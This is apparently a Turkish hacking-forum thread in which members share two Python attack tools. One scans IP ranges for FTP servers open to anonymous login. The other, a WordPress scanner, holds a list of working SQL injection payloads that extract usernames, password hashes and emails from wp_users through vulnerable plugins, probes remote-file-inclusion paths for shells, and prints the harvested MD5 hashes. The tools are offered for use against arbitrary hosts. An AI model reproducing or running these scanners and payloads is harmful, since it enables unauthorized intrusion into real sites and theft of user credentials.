

Anonymous FTP Scanner - Python Script
-
Belirli ip ararlıklarında Anonnymous ftp leri bulmanıza yarayan python script hazırlamışlar arkadaşlar umarım işinize yarar şahsen denemedim gerek duymadım işine yarayacak olan varsa kullanır
#!/usr/bin/env python """ FtpScan.py - Scans for FTP servers allowing Anonymous Login Written by Sotd - twitter.com/#!/Sotd_ Performance update by q8r9e4 """ import sys import threading import Queue import ftplib import socket import time global ftpqueue ftpqueue = Queue.Queue() class Ftp(threading.Thread): """Handles connections""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Connects and checks for anonymous login""" while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: ftp = ftplib.FTP(ip_add) ftp.login() except ftplib.all_errors: print 'Not Working: %s' % (ip_add) else: print 'Working: %s' % (ip_add) write = open('Ftp.txt', "a+") write.write(ip_add + '\n') write.close() ftp.quit() finally: self.queue.task_done() class Scanner(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Connects and checks for anonymous login""" global ftpqueue while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) check = s.connect_ex((str(ip_add), 21)) if check == 0: ftpqueue.put(ip_add) else: print 'No FTP: %s' % (ip_add) s.close() finally: self.queue.task_done() def iprange(): """Creates list of Ip's from Start_Ip to End_Ip and checks for port 21""" start_ip = sys.argv[1] end_ip = sys.argv[2] ip_range = Queue.Queue() start = list(map(int, start_ip.split("."))) end = list(map(int, end_ip.split("."))) tmp = start socket.setdefaulttimeout(3) ip_range.put(start_ip) while tmp != end: start[3] += 1 for i in (3, 2, 1): if tmp[i] == 256: tmp[i] = 0 tmp[i-1] += 1 ip_range.put(".".join(map(str, tmp))) for i in range(10): time.sleep(0.1) thread = Scanner(ip_range) thread.setDaemon(True) thread.start() ip_range.join() if ftpqueue.empty(): print '\nNo FTP servers found\n' sys.exit(0) for i in range(10): thread = Ftp(ftpqueue) thread.setDaemon(True) thread.start() ftpqueue.join() if __name__ == '__main__': if len(sys.argv) != 3: print 'Usage: ./FtpScan <start_ip> <end_ip>' print 'Example: ./FtpScan 127.0.0.1 127.0.0.5' sys.exit(1) else: iprange() -
Çok teşekkürler...
-
-
schwarzseherisch bunu yazdı
bunu çizdim
-
Devamı gelsin istedim :D
bu da gene python ile yazılmış wordpress sql,rfi,cgi bulucu.güncel açıklara göre yeniden düzenlenebilir.
#!/usr/bin/python #WordPress SQL/RFI/CGI scanner. SQL will check #for md5's in the source and RFI/CGI will use #http responses. #http://www.hacker.ps #we9x[at]hotmail[dot]com import sys, urllib2, re, time, httplib #Bad HTTP Responses BAD_RESP = [400,401,404] def main(path): print "[+] Testing:",host.split("/",1)[1]+path try: h = httplib.HTTP(host.split("/",1)[0]) h.putrequest("HEAD", "/"+host.split("/",1)[1]+path) h.putheader("Host", host.split("/",1)[0]) h.endheaders() resp, reason, headers = h.getreply() return resp, reason, headers.get("Server") except(), msg: print "Error Occurred:",msg pass def timer(): now = time.localtime(time.time()) return time.asctime(now) print "\n\t d3hydr8[at]gmail[dot]com WPScan v1.0" print "\t------------------------------------------" sqls = ["index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),use??r_login,CHAR(58)),null,null,null%20FROM%20wp_users/*", "index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_l??ogin,CHAR(58))%20FROM%20wp_users/*", "index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**SELECT**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23", "index?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),n??ull,null,null,null,null+from+wp_tbv_users/*", "plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6??%20from%20wp_users--", "plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6??,7%20from%20wp_users--" "plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,conca(0x7c,user_login,0x7c??,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users", "wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user??_pass,0x7c),4,5/**/FROM/**/wp_users", "plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users", "sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*", "sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*", "forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*", "index?page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201", "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*", "wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x??3a,user_email),3,4+from+wp_users--&display=plain"] rfis = {"plugins/Enigma2.php":"index/wp-content/plugins/Enigma2.php?boarddir=shell", "mygallery/myfunctions/mygallerybrowser.php":"mygallery/myfunctions/mygallerybrowser.php?myPath=shell", "plugins/wp-table/js/wptable-button.phpp":"plugins/wp-table/js/wptable-button.phpp?wpPATH=shell", "plugins/wordtube/wordtube-button.php":"plugins/wordtube/wordtube-button.php?wpPATH=shell", "plugins/myflash/myflash-button.php":"plugins/myflash/myflash-button.php?wpPATH=shell", "plugins/BackUp/Archive.php":"plugins/BackUp/Archive.php?bkpwp_plugin_path=shell", "plugins/BackUp/Archive/Predicate.php":"plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=shell", "plugins/BackUp/Archive/Writer.php":"plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=shell", "plugins/BackUp/Archive/Reader.php":"plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=shell", "plugins/sniplets/modules/syntax_highlight.php":"plugins/sniplets/modules/syntax_highlight.php?libpath=shell"} cgis = {"wp-trackback.php":"http://milw0rm.com/exploits/3095", "wp-admin/users.php":"http://milw0rm.com/exploits/1059", xmlrpc.html:"http://milw0rm.com/exploits/1077", "wp-includes/cache.php":"http://milw0rm.com/exploits/6", "wp-trackback.php":"http://milw0rm.com/exploits/3095", "plugins/mygallerytmpl.php":"http://milw0rm.com/exploits/3814", "wp-admin/admin-ajax.php":"http://milw0rm.com/exploits/3960", "wp-app.php":"http://milw0rm.com/exploits/4113", "plugins/pictpress/resize.php":"http://milw0rm.com/exploits/4695", "plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php":"http://milw0rm.com/exploits/4844", "plugins/wp-adserve/adclick.php":"http://milw0rm.com/exploits/5013", "wp-admin/admin.php?page=dmsguestbook":"http://milw0rm.com/exploits/5035", "plugins/downloads-manager/upload.php":"http://milw0rm.com/exploits/6127"} if len(sys.argv) != 2: print "\nUsage: ./wpscan.py <site+dir>" print "Ex: ./wpscan.py www.site.com/wp-content/\n" sys.exit(1) host = sys.argv[1].replace("http://","").rsplit("/",1)[0] if host[-1] != "/": host = host+"/" print "\n[+] Site:",host print "[+] SQL Loaded:",len(sqls) print "[+] RFI Loaded:",len(rfis) print "[+] CGI Loaded:",len(cgis) server = main("/")[2] print "[+] Server:",server print "\n[+] Started:",timer() print "\n[+] Scanning: SQL\n" for sql in sqls: time.sleep(2) #Change this if needed print "[+] Trying:",sql.replace("\n","") try: source = urllib2.urlopen("http://"+host+sql.replace("\n","")).read() md5s = re.findall("[a-f0-9]"*32,source) if len(md5s) >= 1: print "[!]",host+sql.replace("\n","") for md5 in md5s: print "\n\t[+]MD5:",md5 except(urllib2.HTTPError): pass print "\n[+] Scanning: RFI\n" for rfi, shell in rfis.items(): resp,reason,server = main(rfi) if resp not in BAD_RESP: print "\t[+] Got:",resp, reason print "\t[+] Try:",host+shell else: print "\t[-] Got:",resp, reason print "\n[+] Scanning: CGI\n" for cgi, expl in cgis.items(): resp,reason,server = main(cgi) if resp not in BAD_RESP: print "\t[+] Got:",resp, reason print "\t[+] Check:",expl else: print "\t[-] Got:",resp, reason print "\n[-] Done\n" -
hacılar bunu nasıl çalıştırıyoruz desem :D
Toplam Hit: 4072 Toplam Mesaj: 6